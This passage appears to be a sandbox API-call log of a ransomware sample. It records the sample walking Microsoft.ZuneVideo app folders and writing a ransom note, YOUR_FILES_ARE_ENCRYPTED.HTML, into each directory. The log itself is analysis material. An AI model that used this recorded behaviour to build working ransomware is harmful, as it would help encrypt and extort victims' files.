cAlternateFileName="")) returned 0 [0121.140] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.140] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0121.140] GetProcessHeap () returned 0x600000 [0121.140] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.140] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.141] CloseHandle (hObject=0x31c) returned 1 [0121.141] GetProcessHeap () returned 0x600000 [0121.141] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.141] GetProcessHeap () returned 0x600000 [0121.141] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.141] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="Temp", cAlternateFileName="")) returned 0 [0121.141] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.142] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0121.142] GetProcessHeap () returned 0x600000 [0121.142] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.142] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.143] CloseHandle (hObject=0x324) returned 1 [0121.143] GetProcessHeap () returned 0x600000 [0121.143] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.143] GetProcessHeap () returned 0x600000 [0121.143] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.144] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbb59ab3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbb59ab3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.145] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.145] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData") returned 90 [0121.145] GetProcessHeap () returned 0x600000 [0121.145] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.145] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData" [0121.145] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\*" [0121.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbb59ab3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbb59ab3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0121.146] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbb59ab3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbb59ab3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.146] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbb59ab3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbb59ab3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbb59ab3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 0 [0121.146] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0121.146] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0121.146] GetProcessHeap () returned 0x600000 [0121.146] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.147] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.148] CloseHandle (hObject=0x324) returned 1 [0121.148] GetProcessHeap () returned 0x600000 [0121.148] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.148] GetProcessHeap () returned 0x600000 [0121.148] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.149] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.149] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.149] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache") returned 93 [0121.149] GetProcessHeap () returned 0x600000 [0121.149] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.150] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache" [0121.150] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\*" [0121.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.150] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.150] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 0 [0121.150] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.150] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.150] GetProcessHeap () returned 0x600000 [0121.150] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.153] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.154] CloseHandle (hObject=0x324) returned 1 [0121.154] GetProcessHeap () returned 0x600000 [0121.154] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.154] GetProcessHeap () returned 0x600000 [0121.155] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.155] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.155] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.155] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState") returned 93 [0121.155] GetProcessHeap () returned 0x600000 [0121.155] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.155] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState" [0121.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\*" [0121.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.155] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.155] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfba9af62, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfba9af62, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 0 [0121.155] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.155] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.155] GetProcessHeap () returned 0x600000 [0121.155] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.156] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.157] CloseHandle (hObject=0x324) returned 1 [0121.157] GetProcessHeap () returned 0x600000 [0121.157] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.157] GetProcessHeap () returned 0x600000 [0121.157] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.157] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc8507ce, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc8507ce, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0121.157] StrStrIW (lpFirst="Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.157] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe") returned 133 [0121.157] GetProcessHeap () returned 0x600000 [0121.157] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.157] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe" [0121.157] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\*" [0121.157] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc8507ce, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc8507ce, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626978 [0121.158] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc8507ce, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc8507ce, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.158] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8507ce, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc8507ce, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc95ba08, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0121.158] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.158] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 149 [0121.158] GetProcessHeap () returned 0x600000 [0121.158] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.159] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore" [0121.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: 